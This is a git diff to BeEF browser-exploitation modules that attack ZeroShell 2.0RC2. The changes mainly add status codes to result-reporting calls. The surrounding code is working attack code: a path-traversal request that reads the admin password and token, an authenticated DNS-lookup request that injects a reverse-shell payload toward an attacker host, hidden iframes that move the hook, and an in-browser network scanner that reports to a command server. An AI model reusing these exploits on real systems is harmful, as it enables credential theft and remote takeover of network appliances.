diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js index 9c2804923..7951005f6 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js @@ -10,24 +10,24 @@ beef.execute(function() { var uripwd = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw"; var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet"; - + var pwd = ""; var token = ""; beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){ if(response1.status_code == 200){ pwd = response1.response_body.trim(); - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success()); beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){ if(response2.status_code == 200){ token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40); - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success()); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed."); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error()); } }); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed."); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js index 4cb93d5bf..10d888402 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js @@ -5,16 +5,16 @@ // beef.execute(function() { - var rhost = '<%= @rhost %>'; + var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; - var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw"; + var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw"; beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){ if(response.status_code == 200){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]"); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]", beef.are.status_success()); }else{ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed."); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js index 1df0e5117..eafdcf774 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js @@ -5,16 +5,16 @@ // beef.execute(function() { - var rhost = '<%= @rhost %>'; + var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; - var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin"; + var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin"; beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){ if(response.status_code == 200){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]"); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]", beef.are.status_success()); }else{ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed."); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js index 65b78bd57..5e354fd6b 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js @@ -5,17 +5,17 @@ // beef.execute(function() { - var rhost = '<%= @rhost %>'; + var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var rfile = '<%= @rfile %>'; - var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile; + var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile; beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){ if(response.status_code == 200){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]"); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.are.status_success()); }else{ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed."); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js index 5e0f193db..18ac99ef0 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js @@ -5,7 +5,7 @@ // beef.execute(function() { - var rhost = '<%= @rhost %>'; + var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook; @@ -14,5 +14,5 @@ beef.execute(function() { var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); iframe_<%= @command_id %>.setAttribute('src', target); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell", beef.are.status_unknown()); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js index 4b2664bf4..cbaa0e46d 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js @@ -5,7 +5,7 @@ // beef.execute(function() { - var rhost = '<%= @rhost %>'; + var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var lhost = '<%= @lhost %>'; var lport = '<%= @lport %>'; @@ -20,27 +20,27 @@ beef.execute(function() { beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){ if(response1.status_code == 200){ pwd = response1.response_body.trim(); - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success()); beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){ if(response2.status_code == 200){ token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40); - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success()); beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "Lookup", Section: "DNS", DNS: "localhost", STk: token, - What: payload + What: payload }, 10, 'script', false, null, function(response3){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered."); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.", beef.are.status_unknown()); } ); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed."); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error()); } }); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed."); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error()); } }); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js index 4864042ee..5a190f6f4 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js @@ -5,7 +5,7 @@ // beef.execute(function() { - var rhost = '<%= @rhost %>'; + var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var lhost = '<%= @lhost %>'; var lport = '<%= @lport %>'; @@ -15,5 +15,5 @@ beef.execute(function() { var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); iframe_<%= @command_id %>.setAttribute('src', target); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered."); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.", beef.are.status_unknown()); }); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js index 92f794467..56c33c5d3 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js @@ -71,11 +71,11 @@ beef.execute(function() { var div = document.createElement('div'); // Hidden div container div.setAttribute('style', 'display:none;'); document.body.appendChild(div); - + add = function(data){ result += data + " "; } - + // Scan function to inject markups in victim's DOM. // This function is recalled by herself to scan each IP bloc of the IP range defined scan = function(){ @@ -91,13 +91,13 @@ beef.execute(function() { i++; } var ip_to_long_bloc = ip_from_long; // Save the ending IPv4 address for the current bloc - + // Function to return results of the current bloc scanned to BeEF C&C, after "timeout" ms waited. getResult = function(){ if(result.trim() != "") - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]", beef.are.status_success()); else - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc..."); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...", beef.are.status_unknown()); div.innerHTML = ""; // Clean the current DOM's div result = ""; // Clear the result of the bloc tested for the next loop } @@ -107,9 +107,9 @@ beef.execute(function() { else // We have reach the last IP address to scan setTimeout(function(){ // Clear the victim's DOM and tell to BeEF C&C that the scan is complete document.body.removeChild(div); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)", beef.are.status_success()); }, timeout*2); } - + scan(); // Run the first bloc scan });